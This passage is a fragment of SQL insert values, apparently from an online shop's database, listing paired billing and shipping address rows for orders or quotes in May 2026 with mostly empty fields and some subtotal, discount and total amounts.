(2107, 1237, '2026-05-03 14:14:39', '2026-05-03 14:14:39', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2108, 1237, '2026-05-03 14:14:39', '2026-05-03 14:14:39', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2109, 1238, '2026-05-03 14:14:40', '2026-05-03 14:14:40', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2110, 1238, '2026-05-03 14:14:40', '2026-05-03 14:14:40', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2111, 1239, '2026-05-03 14:20:12', '2026-05-03 14:20:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2112, 1239, '2026-05-03 14:20:12', '2026-05-03 14:20:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2113, 1240, '2026-05-03 17:06:04', '2026-05-03 17:06:04', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2114, 1240, '2026-05-03 17:06:04', '2026-05-03 17:06:04', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2115, 1241, '2026-05-03 21:53:05', '2026-05-03 21:53:05', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2116, 1241, '2026-05-03 21:53:05', '2026-05-03 21:53:05', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2117, 1242, '2026-05-04 00:43:23', '2026-05-04 00:43:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2118, 1242, '2026-05-04 00:43:23', '2026-05-04 00:43:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2119, 1243, '2026-05-04 05:21:16', '2026-05-04 05:21:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2120, 1243, '2026-05-04 05:21:16', '2026-05-04 05:21:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2121, 1244, '2026-05-04 08:27:20', '2026-05-04 08:27:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2122, 1244, '2026-05-04 08:27:20', '2026-05-04 08:27:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2123, 1245, '2026-05-04 12:59:21', '2026-05-04 12:59:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2124, 1245, '2026-05-04 12:59:21', '2026-05-04 12:59:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2125, 1246, '2026-05-04 16:34:12', '2026-05-04 16:34:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2126, 1246, '2026-05-04 16:34:12', '2026-05-04 16:34:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2127, 1247, '2026-05-04 20:43:18', '2026-05-04 20:43:18', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2128, 1247, '2026-05-04 20:43:18', '2026-05-04 20:43:18', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2129, 1248, '2026-05-05 00:26:39', '2026-05-05 00:26:39', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2130, 1248, '2026-05-05 00:26:39', '2026-05-05 00:26:39', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2131, 1249, '2026-05-05 01:43:19', '2026-05-05 01:43:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2132, 1249, '2026-05-05 01:43:19', '2026-05-05 01:43:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2133, 1250, '2026-05-05 04:06:51', '2026-05-05 04:06:51', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2134, 1250, '2026-05-05 04:06:51', '2026-05-05 04:06:51', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2135, 1251, '2026-05-05 08:00:35', '2026-05-05 08:00:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2136, 1251, '2026-05-05 08:00:35', '2026-05-05 08:00:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2137, 1252, '2026-05-05 11:49:23', '2026-05-05 11:49:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2138, 1252, '2026-05-05 11:49:23', '2026-05-05 11:49:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2139, 1253, '2026-05-05 16:06:30', '2026-05-05 16:06:30', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2140, 1253, '2026-05-05 16:06:30', '2026-05-05 16:06:30', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2141, 1254, '2026-05-05 17:51:00', '2026-05-05 17:51:00', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2142, 1254, '2026-05-05 17:51:00', '2026-05-05 17:51:00', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2143, 1255, '2026-05-05 17:51:07', '2026-05-05 17:51:07', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2144, 1255, '2026-05-05 17:51:07', '2026-05-05 17:51:07', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2145, 1256, '2026-05-05 17:51:09', '2026-05-05 17:51:09', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2146, 1256, '2026-05-05 17:51:09', '2026-05-05 17:51:09', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2147, 1257, '2026-05-05 17:51:15', '2026-05-05 17:51:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2148, 1257, '2026-05-05 17:51:15', '2026-05-05 17:51:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2149, 1258, '2026-05-05 17:51:31', '2026-05-05 17:51:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2150, 1258, '2026-05-05 17:51:31', '2026-05-05 17:51:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2151, 1259, '2026-05-05 17:51:45', '2026-05-05 17:51:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2152, 1259, '2026-05-05 17:51:45', '2026-05-05 17:51:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
